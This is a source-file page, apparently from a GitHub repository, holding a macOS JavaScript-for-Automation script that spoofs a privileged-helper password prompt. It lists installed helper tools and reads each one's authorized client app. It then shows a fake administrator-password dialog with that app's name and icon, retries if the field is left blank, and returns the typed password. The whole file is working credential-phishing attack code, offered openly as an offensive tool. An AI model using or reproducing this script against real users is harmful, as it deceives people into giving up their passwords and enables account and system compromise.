-
Notifications
You must be signed in to change notification settings - Fork 27
/
PrivilegedHelperToolSpoof.js
131 lines (113 loc) · 4.74 KB
/
PrivilegedHelperToolSpoof.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
ObjC.import('Foundation')
ObjC.import('AppKit')
var currentApp = Application.currentApplication();
currentApp.includeStandardAdditions = true;
var contextApp = currentApp.systemAttribute('__CFBundleIdentifier')
var contextString = contextApp.toString()
var newApp = Application(contextString)
newApp.includeStandardAdditions = true;
function PrivHelpToolSpoof(){
function listDirectory(strPath) {
var fm = $.NSFileManager.defaultManager;
return ObjC.unwrap(
fm.contentsOfDirectoryAtPathError($(strPath)
.stringByExpandingTildeInPath, null))
.map(ObjC.unwrap);
}
var output = "";
var PrivilegedHelperExistsCheck = $.NSFileManager.alloc.init.fileExistsAtPath('/Library/PrivilegedHelperTools')
if (PrivilegedHelperExistsCheck == true) {
var enumerateFolderContents = listDirectory('/Library/PrivilegedHelperTools')
function stoperror() {
return true;
}
var fullPaths = []
for (var key in enumerateFolderContents) {
try{
var parentHelper = currentApp.doShellScript("launchctl plist __TEXT,__info_plist " + " " + '/Library/PrivilegedHelperTools/' + enumerateFolderContents[key] + " " + "| grep -A1 AuthorizedClients")
var formatPaths = parentHelper.split('identifier')[1].split('and')[0]
}catch(e){stoperror(e)}
fullPaths += formatPaths + "\n";
}
var fixedFileOutput = fullPaths.replace(/,/gi, "\n");
var splitFileOutput = fixedFileOutput.split("\n")
var cleanFullPaths = [];
for (var i = 0; i < splitFileOutput.length; i++) {
if (splitFileOutput[i] != "undefined") {
cleanFullPaths.push(splitFileOutput[i]);
}
}
var defaultIconName = "AppIcon"
var defaultIconStr = "/System/Library/PrivateFrameworks/PreferencePanesSupport.framework/PlugIns/AdvertisingExtension.appex/Contents/Resources/icon.icns"
var resourcesFolder = "/Contents/Resources"
var iconExt = ".icns"
var makeChanges = " wants to make changes."
var privString = "Enter the Administrator password for "
var allowThis = " to allow this."
var userName = currentApp.systemInfo().shortUserName;
var hlprName = cleanFullPaths[0].replace(/['"]+/g, '').trim()
var text = hlprName + makeChanges + "\n" + privString + userName + allowThis
var title = $.NSWorkspace.sharedWorkspace.URLForApplicationWithBundleIdentifier(hlprName).fileSystemRepresentation + '';
var wonkyApp = title.toString()
if (wonkyApp == "undefined" ){
var iconNameString = "noicon"
var appName = "Application is Unable to Continue" + "\n" + "Please Close the Application"
}else {
var appName = title.split('/').slice(-1)
var iconFolder = title + "/Contents/Resources/"
var enumerateIconfolder = listDirectory(iconFolder)
var iconName =
enumerateIconfolder.filter(function(file){
return file.indexOf(iconExt) !== -1;
});
var iconNameString = iconName.toString()
}
if (iconNameString.includes('icns') == true ){
var icon = iconFolder + iconName[0]
} else {var icon = "/System/Library/PrivateFrameworks/PreferencePanesSupport.framework/PlugIns/AdvertisingExtension.appex/Contents/Resources/icon.icns"
}
var prompt = newApp.displayDialog(text, {
defaultAnswer: "",
buttons: ['OK', 'Cancel'],
defaultButton: 'OK',
cancelButton: 'Cancel',
withTitle: appName,
withIcon: Path(icon),
hiddenAnswer: true
});
var promptResults = prompt.textReturned
if (promptResults == ""){
var textagain = appName + " is Unable to Continue" + "\n" + "Please Close the Application or " + privString + userName
var promptagain = newApp.displayDialog(textagain, {
defaultAnswer: "",
buttons: ['OK', 'Cancel'],
defaultButton: 'OK',
cancelButton: 'Cancel',
withTitle: appName,
withIcon: Path(icon),
hiddenAnswer: true
});
var promptResultsRound2 = promptagain.textReturned
output += "**************************************\n" + "**** Contents of the Prompt Entry ****\n" + "**************************************\n" + promptResultsRound2 + "\n"
} else {
output += "**************************************\n" + "**** Contents of the Prompt Entry ****\n" + "**************************************\n" + promptResults + "\n"
}
} else {
var config = [];
var icon = "/System/Library/PrivateFrameworks/PreferencePanesSupport.framework/PlugIns/AdvertisingExtension.appex/Contents/Resources/icon.icns";
var title = "An Application Needs an Update to Continue";
var text = "An Application Needs an Update to Continue";
var promptClassic = newApp.displayDialog(text, {
defaultAnswer: "",
buttons: ['OK', 'Cancel'],
defaultButton: 'OK',
cancelButton: 'Cancel',
withTitle: title,
withIcon: Path(icon),
hiddenAnswer: true
});
var promptResultsclassic = promptClassic.textReturned
output += "**************************************\n" + "**** Contents of the Prompt Entry ****\n" + "**************************************\n" + promptResultsclassic + "\n"
}
return output
}